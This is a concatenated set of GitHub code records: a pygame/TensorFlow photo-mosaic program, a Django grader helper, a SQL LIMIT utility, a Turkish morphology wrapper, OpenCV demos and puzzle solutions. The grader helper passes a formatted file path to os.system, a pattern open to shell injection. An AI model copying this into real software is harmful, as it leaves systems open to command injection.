COCO\n self.coco_model = use_coco # TODO COCO\n a_logger.debug(\"Screen size: {}, {}\".format(pygame.display.Info().current_w, pygame.display.Info().current_h))\n\n self.ratio = 1 # self.screen.get_width() / size[0] #TODO\n\n self.new_ts = min(int(self.ratio * TILE_SIZE), TILE_SIZE)\n if self.ratio != 1:\n self.tiles = [pygame.transform.smoothscale(t, (self.new_ts, self.new_ts)) for t in surface_tiles]\n else:\n self.tiles = surface_tiles\n self.img = pygame.Surface((self.new_ts * self.x_tile_count, self.new_ts * self.y_tile_count))\n self.rects = pygame.Surface((self.new_ts * self.x_tile_count, self.new_ts * self.y_tile_count))\n self.rects.set_colorkey((0, 0, 0))\n self.output = pygame.Surface((self.new_ts * self.x_tile_count, self.new_ts * self.y_tile_count))\n\n self.ratio = self.new_ts / TILE_SIZE\n\n if init_mode == InitMode.Random:\n self.init_randomly(self.tiles)\n elif init_mode == InitMode.Hue:\n self.init_by_hue(tiles)\n elif init_mode == InitMode.Image and init_image is not None:\n init_img = pygame.image.load(init_image).convert()\n if int(self.img.get_width() / self.img.get_height()) != int(init_img.get_width() / init_img.get_height()):\n raise AttributeError(\"Init image size doesn't match that of mosaic image\")\n try:\n x = pickle.load(open(init_image + \".coords2id.pkl\", \"rb\"))\n for i in range(len(x)):\n self.coords2id[i] = x[i]\n self.coords2id = pickle.load(open(init_image + \".coords2id.pkl\", \"rb\"))\n except Exception as e:\n a_logger.exception(\"Error reading coords2id pkl file: {}\".format(e))\n init_img = pygame.transform.scale(init_img, (self.img.get_width(), self.img.get_height()))\n self.img.blit(init_img, (0, 0))\n self.screen.blit(self.img, (0, 0))\n\n pygame.display.update()\n\n def init_randomly(self, tiles):\n\n progress = ProgressCounter(self.total_tiles_in_image, \"initializing mosaic image randomly\")\n # will be used to get random tiles without replacement, unless tiles in image >> number of tile file\n\n rand_ids = list(range(len(tiles)))\n random.shuffle(rand_ids)\n\n blit_list = []\n\n for i in range(len(tiles)):\n if i < self.total_tiles_in_image:\n y = i % self.y_tile_count\n x = int(i / self.y_tile_count)\n\n coords = (x * self.new_ts, y * self.new_ts, (x + 1) * self.new_ts, (y + 1) * self.new_ts)\n\n random_index = rand_ids[i]\n tile = tiles[random_index]\n blit_list.append((tile, coords))\n self.coords2id[y * self.x_tile_count + x] = random_index\n else:\n random_index = rand_ids[i]\n self.coords2id[i] = random_index\n\n progress.update()\n\n self.img.blits(blit_list)\n\n def init_by_hue(self, tiles):\n\n progress = ProgressCounter(self.total_tiles_in_image, \"initializing mosaic image by hue\")\n\n # get a representative sample of dataset, so we don't take the first n elements from a sorted list\n sample = tiles\n if len(tiles) > self.x_tile_count * self.y_tile_count:\n sample = random.sample(tiles, self.x_tile_count * self.y_tile_count)\n\n hue = self.sort_by_hue(sample)\n\n blit_list = []\n for x in range(self.x_tile_count):\n for y in range(self.y_tile_count):\n coords = (x * self.new_ts, y * self.new_ts, (x + 1) * self.new_ts, (y + 1) * self.new_ts)\n\n tile_idx = hue[(x * self.y_tile_count + y) % len(hue)][1]\n\n tile = pygame.surfarray.make_surface(np.array(sample[tile_idx]).reshape((TILE_SIZE, TILE_SIZE, 3)))\n tile = pygame.transform.scale(tile, (self.new_ts, self.new_ts))\n\n blit_list.append((tile, coords))\n self.coords2id[y * self.x_tile_count + x] = tile_idx\n progress.update()\n\n self.img.blits(blit_list)\n\n # input: a list of tile images\n # output: a sorted list of these image tiles, sorted bu hue values\n @staticmethod\n def sort_by_hue(tiles):\n hue = []\n\n for i, im in enumerate(tiles):\n h = get_hue(im)\n hue.append((h, i))\n\n hue.sort(key=itemgetter(0))\n _, coords = zip(*hue)\n return hue\n\n def add_tile(self, coords, index, video_camera, switch, results, abc):\n self.pseudo_frame_counter += 1\n if switch:\n c1 = coords[0]\n id1 = index[0]\n c2 = coords[1]\n id2 = index[1]\n c3 = coords[2]\n id3 = index[2]\n\n if abc == BAC:\n self.switch_and_add(c2, id1)\n self.switch_and_add(c1, id2)\n elif abc == BCA:\n self.switch_and_add(c1, id2)\n self.switch_and_add(c2, id3)\n self.switch_and_add(c3, id1)\n\n elif abc == CBA:\n self.switch_and_add(c3, id1)\n self.switch_and_add(c1, id3)\n\n elif abc == CAB:\n self.switch_and_add(c1, id3)\n self.switch_and_add(c2, id1)\n self.switch_and_add(c3, id2)\n\n elif abc == ACB:\n self.switch_and_add(c3, id2)\n self.switch_and_add(c2, id3)\n else:\n tile_data = self.tiles[index]\n x_c = int(coords[0] * self.ratio)\n y_c = int(coords[1] * self.ratio)\n self.blits.append((tile_data, (x_c, y_c)))\n #self.img.blit(tile_data, (x_c, y_c))\n\n if self.pseudo_frame_counter % 8 == 0 or results is not None or (\n int(time() * 1000) - self.last_frame_time >= 100):\n self.frame_counter += 1\n self.last_frame_time = int(time() * 1000)\n self.img.blits(self.blits)\n self.blits.clear()\n self.show_frame(results, video_camera)\n\n def switch_and_add(self, c_i, id_j):\n if c_i < self.total_tiles_in_image:\n tile_data1 = self.tiles[id_j]\n\n x = c_i % self.x_tile_count\n y = int(c_i / self.x_tile_count)\n coords = (x * self.new_ts, y * self.new_ts, (x + 1) * self.new_ts, (y + 1) * self.new_ts)\n\n self.blits.append((tile_data1, coords))\n # self.img.blit(tile_data1, coords)\n\n def show_frame(self, result, vidcam=None):\n\n frame_annotate_rate = 400\n\n if self.frame_counter % frame_annotate_rate == 1:\n # convert to array for tf model. array3d swaps axes, so need to swap back\n resized = pygame.surfarray.array3d(self.img)\n resized = resized.swapaxes(0, 1)\n\n try:\n self.requestQ.put((resized, self.coco_model), block=False)\n except queue.Full:\n a_logger.warning(\"Ml queue full\")\n # self.frame_counter-=40\n pass\n if result is not None:\n if self.coco_model:\n self.draw_boxes(\n result[\"detection_boxes\"][0],\n result[\"detection_classes\"][0], result[\"detection_scores\"][0])\n else: # TODO coco\n self.draw_boxes(\n result[\"detection_boxes\"],\n result[\"detection_class_entities\"], result[\"detection_scores\"])\n\n self.output.blit(self.img, (0, 0))\n self.output.blit(self.rects, (0, 0))\n self.screen.blit(self.output, (0, 0))\n pygame.display.flip()\n self.fpsClock.tick(15)\n\n if vidcam is not None:\n frame = pygame.surfarray.array3d(self.output)\n frame = frame.swapaxes(0, 1)\n frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)\n vidcam.write(frame)\n\n @staticmethod\n def save(surface, path):\n pygame.image.save(surface, path)\n\n def draw_boxes(self, boxes, class_names, scores, max_boxes=MAX_BOXES, min_score=0.01):\n # Overlay labeled boxes on an image with formatted scores and label names.\n self.rects.fill((0, 0, 0))\n\n im_width, im_height = self.rects.get_size()\n\n max_results = min(boxes.shape[0], max_boxes)\n for i in range(max_results - 1, -1, -1):\n if scores[i] >= min_score:\n ymin, xmin, ymax, xmax = tuple(boxes[i])\n if self.coco_model:\n class_name = self.category_index[class_names[i]]['name']\n display_str = \"{} ({}%)\".format(class_name, int(100 * scores[i]))\n else: # TODO coco\n display_str = \"{} ({}%)\".format(class_names[i].decode(\"ascii\"), int(100 * scores[i]))\n\n color = self.colors[hash(class_names[i]) % len(self.colors)]\n font_color = self.get_contrast_color(color)\n\n (left, right, top, bottom) = (xmin * im_width, xmax * im_width,\n ymin * im_height, ymax * im_height)\n\n text = self.font.render(display_str, True, font_color)\n text_rect = text.get_rect()\n text_width, text_height = text_rect.width, text_rect.height\n\n if top - text_height > 0:\n text_bottom = top\n else:\n text_bottom = top + text_height\n\n if left + text_width > im_width:\n text_left = right - text_width\n else:\n text_left = left\n\n text_rect.bottomleft = (text_left, text_bottom)\n\n pygame.draw.lines(self.rects, color, True, [(left, top), (left, bottom), (right, bottom), (right, top)],\n width=LINE_WIDTH)\n pygame.draw.rect(self.rects, color, text_rect)\n self.rects.blit(text, text_rect)\n\n @staticmethod\n def get_contrast_color(color):\n try:\n i_color = ImageColor.getrgb(color)\n luma = ((0.2126 * i_color[0]) + (0.7152 * i_color[1]) + (0.0722 * i_color[2])) / 255\n wl = 0.05 / (luma + 0.05)\n bl = (luma + 0.05) / 1.05\n if bl > wl:\n font_color = (16, 16, 16) # black\n else:\n font_color = (240, 240, 240)\n except AttributeError:\n a_logger.error(\"Problem with color: {}\".format(color))\n font_color = (16, 16, 16) # black\n pass\n return font_color\n\n\ndef model_runner(request_q, answers_q, terminating_event, ready_event, path):\n a_logger.debug(\"Loading model\")\n\n img = tf.io.read_file(path)\n img = tf.image.decode_jpeg(img, channels=3)\n\n module_handle = MODEL_DIR_COCO2017\n coco_detector = hub.load(module_handle)\n converted_img = tf.expand_dims(tf.image.convert_image_dtype(img, tf.uint8), axis=0)\n # to \"warm up\" the model, so consecutive calls are fast\n coco_detector(converted_img)\n\n module_handle = MODEL_DIR_OPENIMAGES\n openimage_detector = hub.load(module_handle).signatures['default']\n converted_img = tf.image.convert_image_dtype(img, tf.float32)[tf.newaxis, ...]\n openimage_detector(converted_img)\n\n a_logger.debug(\"Model loaded\")\n ready_event.set()\n\n while not terminating_event.is_set():\n try:\n img, use_coco = request_q.get(block=True, timeout=0.05)\n\n if use_coco:\n converted_img = tf.expand_dims(tf.image.convert_image_dtype(img, tf.uint8), axis=0) # TODO COCO\n detector = coco_detector\n else:\n converted_img = tf.image.convert_image_dtype(img, tf.float32)[tf.newaxis, ...]\n detector = openimage_detector\n\n start_time = time()\n result = detector(converted_img)\n end_time = time()\n\n result = {key: value.numpy() for key, value in result.items()}\n\n a_logger.debug(\"Found %d objects.\" % len(result[\"detection_scores\"]))\n a_logger.debug(\"Inference time: {} \".format(end_time - start_time))\n\n answers_q.put(result)\n\n except queue.Empty:\n continue\n except KeyboardInterrupt:\n pass\n break\n\n\ndef build_mosaic(result_queue, size, coords2id, cfg, terminating_event, request_q, answer_q,\n mosaic_ready_event, ml_ready_event):\n create_video = cfg.create_video\n switch = cfg.building_order == BuildMode.Switch\n\n active_workers = WORKER_COUNT\n video_camera = None\n\n a_logger.debug(\"Creating mosaic image\")\n mosaic = MosaicImage(size, cfg.tiles_file, cfg.init_order, cfg.init_image, cfg.use_coco, coords2id, request_q)\n\n if not ml_ready_event.is_set():\n a_logger.debug(\"Waiting for ML model\")\n show_text(mosaic.screen, \"Loading Machine Learning model...\")\n for _ in pygame.event.get():\n pass\n ml_ready_event.wait()\n\n # signal that working processes can start\n a_logger.debug(\"Mosaic is ready!\")\n mosaic_ready_event.set()\n\n if create_video:\n size = (mosaic.output.get_size()) # TODO\n video_camera = cv2.VideoWriter(OUTPUT_VIDEO_FILE_NAME, cv2.VideoWriter_fourcc(*'DIVX'), FPS, size)\n counter = 0\n\n # Sanity check to empty queue from last run\n try:\n answer_q.get(block=False)\n except queue.Empty:\n pass\n\n abc = -1\n while True:\n try:\n for e in pygame.event.get():\n if e.type == pygame.QUIT or e.type == KEYDOWN and e.key == K_ESCAPE:\n raise KeyboardInterrupt\n\n if switch:\n img_coords, index, abc = result_queue.get(block=True, timeout=0.01)\n else:\n img_coords, index = result_queue.get(block=True, timeout=0.01)\n if counter % 75 == 0: # TODO\n try:\n results = answer_q.get(block=False)\n except queue.Empty:\n results = None\n pass\n else:\n results = None\n\n if img_coords == EOQ_VALUE:\n active_workers -= 1\n a_logger.debug(\"{} remaining working process out of {}\".format(active_workers, WORKER_COUNT))\n if not active_workers:\n # analyze the last frame\n mosaic.show_frame(results, video_camera)\n break\n else:\n mosaic.add_tile(img_coords, index, video_camera, switch, results, abc)\n counter += 1\n except queue.Empty:\n continue\n except KeyboardInterrupt:\n pass\n break\n\n terminating_event.set()\n\n if video_camera is not None:\n video_camera.release()\n mosaic.save(mosaic.img, OUTPUT_FRAME_IMAGE_FILE_NAME)\n mosaic.save(mosaic.output, OUTPUT_SCREEN_IMAGE_FILE_NAME)\n a_logger.debug('Finished, output is in {}, {}'.format(OUTPUT_FRAME_IMAGE_FILE_NAME, OUTPUT_SCREEN_IMAGE_FILE_NAME))\n\n to_save = [coords2id[i] for i in range(len(coords2id))]\n pickle.dump(to_save, open(OUTPUT_FRAME_IMAGE_FILE_NAME + \".coords2id.pkl\", \"wb\"))\n\n if cfg.wait_for_keypress:\n while True:\n event = pygame.event.wait()\n if event.type == QUIT or event.type == KEYDOWN:\n break\n\n pygame.quit()\n\n\n# Display message center screen\ndef show_text(screen, text):\n font = pygame.font.SysFont('robotoregular', 20)\n text = font.render(text, True, (16, 16, 16))\n text_rect = text.get_rect(topleft=(25, 25))\n pygame.draw.rect(screen, (50, 255, 50), text_rect)\n screen.blit(text, text_rect)\n pygame.display.update()\n\n\ndef compose(conf, request_q, answer_q, ml_ready_event):\n a_logger.debug('Building mosaic, press Ctrl-C to abort...')\n\n original_img_large, original_img_small = TargetImage(conf.image_file).get_data()\n all_tile_data_large, all_tile_data_small = TileProcessor(conf.tiles_file).get_tiles()\n\n x_tile_count = int(original_img_large.size[0] / TILE_SIZE)\n y_tile_count = int(original_img_large.size[1] / TILE_SIZE)\n total_tiles = x_tile_count * y_tile_count\n\n global MAX_REUSE\n MAX_REUSE = max(1, int(total_tiles / len(all_tile_data_large)))\n a_logger.debug(\"MAX_REUSE: {}, mosaic.total_tiles: {}, all_tile_data_large: {}\".format(MAX_REUSE, total_tiles,\n len(all_tile_data_large)))\n\n if MAX_REUSE > 1:\n logging.warning(\n \"mosaic total tiles ({}) is bigger than total number of tiles ({}). Some tiles will be reused more than \"\n \"once\".format(\n MAX_REUSE, total_tiles,\n len(all_tile_data_large)))\n\n result_queue = Queue()\n coords2id = Array('i', len(all_tile_data_large)) # todo was total_tiles\n diff_cache = Array('i', len(all_tile_data_large))\n terminating_event = multiprocessing.Event()\n mosaic_ready_event = multiprocessing.Event()\n lock = Lock()\n manager = multiprocessing.Manager()\n remaining_tiles = manager.dict({idx: 0 for idx in range(len(all_tile_data_large))})\n\n try:\n\n a_logger.debug(\"Starting build mosaic process\")\n\n # start the worker processes that will build the mosaic image\n p = Process(target=build_mosaic,\n args=(\n result_queue, original_img_large.size, coords2id, conf, terminating_event,\n request_q, answer_q, mosaic_ready_event, ml_ready_event))\n p.start()\n processes = []\n\n a_logger.debug(\"Adding tiles to image\")\n if conf.building_order == BuildMode.Switch:\n for n in range(WORKER_COUNT):\n a_logger.debug(\"Starting worker queue {}\".format(n))\n w = Process(target=switch_tiles,\n args=(x_tile_count, y_tile_count, result_queue,\n coords2id, terminating_event, diff_cache, lock, conf, mosaic_ready_event))\n w.start()\n processes.append(w)\n else:\n if conf.building_order == BuildMode.Random:\n sorted_list = list(range(x_tile_count * y_tile_count))\n random.shuffle(sorted_list)\n elif conf.building_order == BuildMode.Ordered:\n flavor = random.randint(1, 4)\n if flavor == 1:\n sorted_list = [y + x * y_tile_count for y in range(y_tile_count) for x in range(x_tile_count)]\n elif flavor == 2:\n sorted_list = [y + x * y_tile_count for y in range(y_tile_count) for x in range(x_tile_count)]\n sorted_list.reverse()\n elif flavor == 3:\n sorted_list = list(range(x_tile_count * y_tile_count))\n elif flavor == 4:\n sorted_list = list(range(x_tile_count * y_tile_count - 1, -1, -1))\n else:\n sorted_list = get_brightness_data(original_img_small, x_tile_count, y_tile_count)\n grey = math.sqrt(0.241 * (128 ** 2) + 0.691 * (128 ** 2) + 0.068 * (128 ** 2))\n random.shuffle(sorted_list)\n\n chunk_size = int(len(sorted_list) / (WORKER_COUNT)) + 1\n\n # create n working processes, each responsible for a chunk of the tiles\n for n in range(0, len(sorted_list), chunk_size):\n a_logger.debug(\n \"Starting worker queue for range {} - {}\".format(n, min(n + chunk_size, len(sorted_list))))\n sub_list = sorted_list[n: min(n + chunk_size, len(sorted_list))]\n\n if conf.building_order == BuildMode.BrightnessReverse or conf.building_order == BuildMode.Brightness:\n sub_list.sort(key=lambda l: (l[0] - grey) ** 2,\n reverse=(conf.building_order == BuildMode.BrightnessReverse))\n _, sub_list = zip(*sub_list)\n\n w = Process(target=fit_tiles,\n args=(\n sub_list, y_tile_count, result_queue, remaining_tiles, diff_cache, lock, conf,\n mosaic_ready_event))\n w.start()\n processes.append(w)\n except Exception as e:\n pass\n a_logger.exception(e)\n terminating_event.set()\n\n a_logger.debug(\"Done setting up working processes, waiting for them to complete\")\n for w in processes:\n w.join()\n p.join()\n a_logger.debug(\"All processes done!\")\n\n\ndef random_run(request_q, answer_q, ready_event):\n try:\n build_modes = len(BuildMode)\n bm = random.randint(1, build_modes)\n\n init_mode = len(InitMode) - 1 # minus 1 since we ended up disliking the Hue sorting TODO\n im = random.randint(1, init_mode)\n\n src_images = glob.glob(INPUT_IMAGES_DIR + \"*.jpg\")\n img = random.choice(src_images)\n\n tiles_files = glob.glob(INPUT_TILES_DIR + \"*.pkl\")\n tiles_file = random.choice(tiles_files)\n\n init_images = glob.glob(INPUT_INIT_IMAGES_DIR + \"*.jpg\")\n init_img = random.choice(init_images)\n\n #use_coco = bool(random.getrandbits(1))\n use_coco = False #todo - I am not very fund of COCO results\n\n a_logger.debug(\"BuildMode: {}, InitMode: {}, src image: {}\".format(BuildMode(bm).name, InitMode(im).name, img))\n\n cfg = Config(create_video=True, save_images=False, init_order=InitMode(im), building_order=BuildMode(bm),\n image_file=img, init_image=init_img, tiles_file=tiles_file, wait_for_keypress=False,\n use_coco=use_coco)\n\n compose(cfg, request_q, answer_q, ready_event)\n except Exception as msg:\n a_logger.exception(msg)\n pass\n\n\ndef main():\n request_q = Queue(5)\n answer_q = Queue()\n terminating_event = multiprocessing.Event()\n ready_event = multiprocessing.Event()\n\n src_images = glob.glob(INPUT_IMAGES_DIR + \"*.jpg\")\n path = random.choice(src_images)\n\n p = Process(target=model_runner, args=(request_q, answer_q, terminating_event, ready_event, path))\n p.start()\n\n while True:\n a_logger.debug(\"Rolling the dice!\")\n random_run(request_q, answer_q, ready_event)\n\n terminating_event.set()\n p.join()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"yarivadan/live_mosaic","sub_path":"mosaic_art.py","file_name":"mosaic_art.py","file_ext":"py","file_size_in_byte":45671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35513061935","text":"from webEval.web_eval__core.models import *\nfrom webEval.web_eval__core.utils__helper import *\n\ndef upload_input_file (file, problem, test):\n input_filename = '%s-%s.in' % (test.no, problem.code)\n input_path = os.path.join(settings.TESTS_DIR, problem.code, input_filename)\n save_file(input_path, file)\n test.input_size = file.size\n test.save()\n os.system(\"svn add %s\" % input_path)\n \n \ndef upload_output_file (file, problem, test):\n output_filename = \"%s-%s.ok\" % (test.no, problem.code)\n output_path = os.path.join(settings.TESTS_DIR, problem.code, output_filename)\n save_file(output_path, file)\n test.output_size = file.size\n test.save()\n os.system(\"svn add %s\" % output_path)\n","repo_name":"hadesgames/webEval","sub_path":"web_eval__core/grader__helper.py","file_name":"grader__helper.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"34328189501","text":"import re\n\n\ndef upper_boundary_maximum_records(sql_cmd: str, max_present: int) -> str:\n \"\"\"\n replace the LIMIT in a query\n Args:\n sql_cmd (str): original sql command\n max_present (max_present): maximum number of returned entries\n\n Returns:\n str: bounded sql command\n \"\"\"\n re_pattern = 'LIMIT [0-9]*'\n limit_number_found = re.findall(re_pattern, sql_cmd, re.IGNORECASE)\n if len(limit_number_found) > 0:\n limit_number_sub = limit_number_found[0]\n limit_number = int(limit_number_sub.split(\" \")[-1])\n if limit_number > max_present:\n sql_cmd = re.sub(re_pattern, f\"LIMIT {max_present}\", sql_cmd)\n return sql_cmd\n","repo_name":"Recherches-Neuro-Hippocampe/llmReflect","sub_path":"llmreflect/Utils/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"70056729852","text":"from jpype import JClass, getDefaultJVMPath, startJVM, shutdownJVM, JString, isJVMStarted, java\nfrom typing import List\nimport os\nimport logging\nfrom lacivert import properties\n\n\nclass Morphology:\n \n \n NOUN = \"Noun\"\n VERB = \"Verb\"\n\n\n def __init__(self):\n \n Morphology: JClass = JClass('zemberek.morphology.TurkishMorphology')\n self.morphology: Morphology = Morphology.createWithDefaults()\n\n self.RootLexicon: JClass = JClass('zemberek.morphology.lexicon.RootLexicon')\n \n self.InformalAnalysisConverter: JClass = JClass('zemberek.morphology.analysis.InformalAnalysisConverter')\n \n self.AnalysisFormatters: JClass = JClass('zemberek.morphology.analysis.AnalysisFormatters')\n \n self.DictionaryItem: JClass = JClass('zemberek.morphology.lexicon.DictionaryItem')\n \n self.WordAnalysis: JClass = JClass('zemberek.morphology.analysis.WordAnalysis')\n \n \n logging.info(\"Morphology class initialized\")\n\n def disambiguate(self, sentence):\n logging.info(\"lemmatization started\")\n analysis: java.util.ArrayList = self.morphology.analyzeSentence(sentence)\n results: java.util.ArrayList = self.morphology.disambiguate(sentence, analysis).bestAnalysis()\n print(\"CHECK BELOW\")\n res: List[str] = []\n\n for i, analysis in enumerate(results, start=1):\n # print(\n # f'\\nAnalysis {i}: {analysis}',\n # f'\\nAnalysis {i}: {type(analysis)}',\n # f'\\nPrimary POS {i}: {analysis.getPos()}'\n # f'\\nPrimary POS (Short Form) {i}: {analysis.getPos().shortForm}',\n # f'\\nMorphemes {i}: {analysis.getMorphemes()}'\n # f'\\nsurFaceForm {i}: {analysis.surfaceForm()}'\n # f'\\ngetLemmas {i}: {analysis.getLemmas()}'\n # f'\\ngetStemAndEnding {i}: {analysis.getStemAndEnding()}'\n # f'\\ngetDictionaryItem {i}: {analysis.getDictionaryItem()}'\n # f'\\ngetDictionaryItem {i}: {type(analysis.getDictionaryItem())}'\n # f'\\nisUnknown {i}: {analysis.isUnknown()}'\n # )\n res.append({\n \"root\": analysis.getLemmas()[0],\n \"pos\": analysis.getPos().shortForm,\n \"dictForm\": analysis.getDictionaryItem(),\n \"dictFormStr\": str(analysis.getDictionaryItem()),\n \"unk\": analysis.isUnknown(),\n \"morphemes\": analysis.getMorphemes(),\n \"morphemesStr\": str(analysis.getMorphemes())\n # f'{str(analysis.getLemmas()[0])}-{analysis.getPos().shortForm}'\n })\n\n\n return res\n\n\n def disambiguate_doc(self, doc): pass\n\n\n def change_stem(self, source_word: str, target_word: str) -> str:\n logging.debug(f\"Stem changing for '{target_word}' using '{source_word}' as source.\")\n new_stem: self.DictionaryItem = (\n self.morphology.getLexicon().getMatchingItems(target_word).get(0)\n )\n\n logging.debug(f\"Lexicon for {target_word} is: {self.morphology.getLexicon().getMatchingItems(target_word).get(0)}\")\n logging.debug(f\"Dict Item of above lexicon {new_stem}\")\n \n\n results: self.WordAnalysis = self.morphology.analyze(JString(source_word))\n\n # print(\"--------------------------------\")\n # print(f\"Word Analysis result of {source_word}\")\n # print(results)\n # print(type(results))\n # print(\"--------------------------------\")\n\n for result in results:\n # print(result.getMorphemes())\n generated: java.util.ArrayList = (\n self.morphology.getWordGenerator().generate(\n new_stem, result.getMorphemes()\n )\n )\n # for gen_word in generated:\n # print(\n # f'\\nInput Analysis: {str(result.formatLong())}'\n # f'\\nAfter Stem Change, Word: {str(gen_word.surface)}'\n # '\\nAfter Stem Change, Analysis:'\n # f'{str(gen_word.analysis.formatLong())}'\n # )\n logging.info(f\"{len(generated)} {'word' if len(generated) == 1 else 'words'} generated.\")\n \n return None if len(generated) == 0 else str(generated[0].surface)\n\n \n def change_stem_of_analysed_word(self, source_word, target_word):\n\n new_stem: self.DictionaryItem = (\n self.morphology.getLexicon().getMatchingItems(target_word).get(0)\n )\n\n logging.debug(f\"Lexicon for {target_word} is: {self.morphology.getLexicon().getMatchingItems(target_word).get(0)}\")\n logging.debug(f\"Dict Item of above lexicon {new_stem}\")\n\n # print(type(source_word[\"morphemes\"]))\n generated: java.util.ArrayList = (\n self.morphology.getWordGenerator().generate(\n new_stem, source_word[\"morphemes\"]\n )\n )\n\n \n # for gen_word in generated:\n # print(\n # f'\\nInput Analysis: {source_word[\"dictFormStr\"]}'\n # f'\\nAfter Stem Change, Word: {str(gen_word.surface)}'\n # '\\nAfter Stem Change, Analysis:'\n # f'{str(gen_word.analysis.formatLong())}'\n # )\n \n logging.info(f\"{len(generated)} {'word' if len(generated) == 1 else 'words'} generated.\")\n \n return None if len(generated) == 0 else str(generated[0].surface)\n","repo_name":"lapestand/lacivert-nlp","sub_path":"lacivert/turkish_nltk/morphology.py","file_name":"morphology.py","file_ext":"py","file_size_in_byte":5484,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"37215845319","text":"import cv2\nimport numpy as np\n\n\nimg = cv2.imread('images/b1.jpg')\nprint(img.shape)\n\n# resize\nnew_img1 = cv2.resize(img, (img.shape[1] // 2, img.shape[0] // 2))\n\n# cutting\nnew_img2 = img[0:100, 0:150]\n\n# blurring (only odd values in tuple)\nnew_img3 = cv2.GaussianBlur(img, (59, 59), 10)\n\n# change color format\nnew_img4 = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n# edge detection\nnew_img5 = cv2.Canny(img, 100, 100)\n\n# dilation and erosion\nkernel = np.ones((5, 5), np.uint8)\nnew_img6 = cv2.dilate(img, kernel, iterations=1)\nnew_img7 = cv2.erode(img, kernel, iterations=10)\n\n\ncv2.imshow('Result', new_img7)\ncv2.waitKey(0)\n\n","repo_name":"SamorodovAI/OpenCV_scripts","sub_path":"pic_sizing.py","file_name":"pic_sizing.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17185919708","text":"import sys\r\nfrom collections import deque\r\nimport copy\r\n\r\n\r\ndef back_tracking(idx):\r\n if len(tmp) == m:\r\n virus_set.append(copy.deepcopy(tmp))\r\n return\r\n\r\n for i in range(idx,len(virus_num)):\r\n if i not in tmp:\r\n tmp.append(i)\r\n back_tracking(i+1)\r\n tmp.pop()\r\n\r\ndef bfs():\r\n graph_copy = copy.deepcopy(graph)\r\n cnt = 0\r\n total = 0\r\n\r\n for g in graph_copy:\r\n total += g.count(0)\r\n\r\n while queue:\r\n cur_x, cur_y,d = queue.popleft()\r\n fl = False\r\n\r\n for i in range(4):\r\n nx = cur_x + dx[i]\r\n ny = cur_y + dy[i]\r\n\r\n if 0 <= nx < n and 0 <= ny < n:\r\n if graph_copy[nx][ny] == 0 or graph_copy[nx][ny] == 2:\r\n if graph_copy[nx][ny] == 0:\r\n cnt += 1\r\n graph_copy[nx][ny] = 3\r\n queue.append((nx,ny,d+1))\r\n if cnt == total:\r\n break\r\n\r\n if cnt != total:\r\n return -1\r\n\r\n return d\r\n\r\n\r\nif __name__ == '__main__':\r\n input = sys.stdin.readline\r\n\r\n n, m = map(int,input().split())\r\n\r\n virus = []\r\n\r\n dx = [-1,1,0,0]\r\n dy = [0,0,-1,1]\r\n\r\n graph = []\r\n for i in range(n):\r\n tmp = list(map(int,input().split()))\r\n graph.append(tmp)\r\n for j in range(n):\r\n if tmp[j] == 2:\r\n virus.append((i,j,0))\r\n\r\n virus_num = [i for i in range(len(virus))]\r\n virus_set = []\r\n tmp = []\r\n\r\n back_tracking(0)\r\n\r\n min = 1e9\r\n\r\n ans = []\r\n for i in range(len(virus_set)):\r\n queue = deque()\r\n for k in virus_set[i]:\r\n queue.append(virus[k])\r\n\r\n result = bfs()\r\n\r\n\r\n if min > result and result != -1:\r\n min = result\r\n\r\n if min == 1e9:\r\n min = -1\r\n print(min)","repo_name":"parkchanbin54/boj","sub_path":"백준/Gold/17142. 연구소 3/연구소 3.py","file_name":"연구소 3.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41566796648","text":"def get_input(path):\n data = None\n with open(path) as f:\n data = f.readlines()\n data = [line for line in data if line[0] != '\\n']\n data = [eval(line) for line in data]\n return data\n\ndef rec_process(left, right):\n '''Returns are -1, 0, 1 in order to pass this as an argument for sorted()'''\n #print(f\"left= {left} right = {right}\")\n \n # if two ints:\n if type(left) == int and type(right) == int:\n if left == right:\n return False\n elif left < right:\n return 1\n else:\n return -1\n\n # if one int and one list\n if type(left) == int and type(right) == list:\n return rec_process([left], right)\n if type(left) == list and type(right) == int:\n return rec_process(left, [right])\n\n # if two lists, recurse\n count = 0\n while count < min([len(left), len(right)]):\n check = rec_process(left[count], right[count])\n if check == 0:\n pass\n elif check == 1:\n return 1\n else:\n return -1\n count += 1\n \n # then if one list shorter than the other\n if len(left) < len(right):\n return 1\n elif len(right) < len(left):\n return -1\n else:\n return 0\n\n# to make part 2 dead easy, we use cmp_to_key for the sorted method\nimport functools\n\ndef d13_1(data):\n pairs = []\n for i in range(0, len(data), 2):\n pairs.append((data[i], data[i+1]))\n \n pairs = [rec_process(pair[0], pair[1]) for pair in pairs]\n addends = []\n for i in range(len(pairs)):\n if pairs[i] == 1:\n addends.append(i + 1)\n return sum(addends)\n\ndef d13_2(data:list):\n data.append([[2]])\n data.append([[6]])\n # this is where the magic happens\n data = sorted(data, key=functools.cmp_to_key(rec_process), reverse=True)\n ret = (data.index([[2]]) + 1) * (data.index([[6]]) + 1)\n return ret\n\nif __name__ == \"__main__\":\n p1 = \"res.txt\"\n p2 = \"sample.txt\"\n data = get_input(p1)\n r1 = d13_1(data)\n r2 = d13_2(data)\n print(\"answer 1:\", r1)\n print(\"answer:\", r2)","repo_name":"loydp/Advent_of_Code","sub_path":"2022/d13/d13.py","file_name":"d13.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26238001048","text":"from django.urls import include, path\nfrom django.conf.urls import url\nimport ordersapp.views as ordersapp\n\nfrom . import views\n\nurlpatterns = 